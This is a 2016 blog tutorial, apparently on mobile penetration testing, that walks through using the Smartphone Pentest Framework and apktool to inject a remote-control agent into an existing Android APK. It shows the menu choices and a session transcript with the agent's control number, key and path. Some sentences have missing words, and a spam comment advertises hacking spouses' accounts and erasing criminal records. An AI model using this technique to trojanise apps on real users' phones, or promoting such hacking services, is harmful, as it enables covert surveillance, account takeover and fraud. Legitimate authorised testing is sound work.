Monday 8 February 2016

Backdooring any APK using OpenSource PENETRATION TESTING tools

Backdooring any APK using OpenSource PENETRATION TESTING tools

Smartphone Pentest Framework ships in with  and is quiet well known for its utility in the of the  Devices . It has a huge range of attack tools included in itself for penetration testing of the Android devices . One of the features is to take a compiled APK file and add backdoor code to it . This tutorial is about how you can take custom compiled APK files and add the SPF backdoor to them .
The resulting app looks and feels like the original app, but with some extra functionality. This is just what a would want .

Building SPF Agents: Backdooring Any APK : 

Backdooring any APK using OpenSource PENETRATION TESTING tools
Lets say you are doing a Mobile  Audit for an organisation . If you dont want to use the plain APK generated by the SPF then SPF allows you to take a pre compiled APK and Add custom backdoor code to it . This is also known as refactoring the APK in the penetration testing terms . This however will require you to use a third party apktool .
To backdoor an APK choose option 1 from the main menu followed by 5.) Backdoor APK with Agent. You will be prompted for the APK to backdoor. If apktool is not found SPF will ask you if you want to download it before continuing.
spf> 1
Select An Option from the Menu:
1.) Attach Framework to a Deployed Agent
2.) Generate Agent App
3.) Copy Agent to Web Server
4.) Import an Agent Template
5.) Backdoor Android APK with Agent
6.) Create APK Signing Key
spf> 5
APKTool not found! Is it installed? Check your config file
Install Android APKTool(y/N)?
spf> y
..snip..
Puts the Android Agent inside an Android App APK. The application runs normally with extra functionality
APK to Backdoor: /root/Desktop/MapsDemo.apk
I: Baksmaling...







You will be prompted for the same information for control as backdooring source code.






Phone number of the control modem for the agent: 15555215554
Control key for the agent: KEYKEY1
Webserver control path for agent: /androidagent1
Control Number: 15555215554
Control Key:KEYKEY1
ControlPath:/androidagent1
Is this correct?(y/n) y
..snip..







The APK will be rebuilt with the SPF Agent included.



Clean and Simple as that . This is as quick as it can get  .  Thanks to Georgia Weidman SmartPhone Pentest Framework is Open source and allows quick penetration testing of the Mobile Devices .












Posted by



at






















Labels:


















1 comment:








  1. felisha green23 May 2020 at 02:14
    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com
    ReplyDelete




























        

      









Subscribe to:
Post Comments (Atom)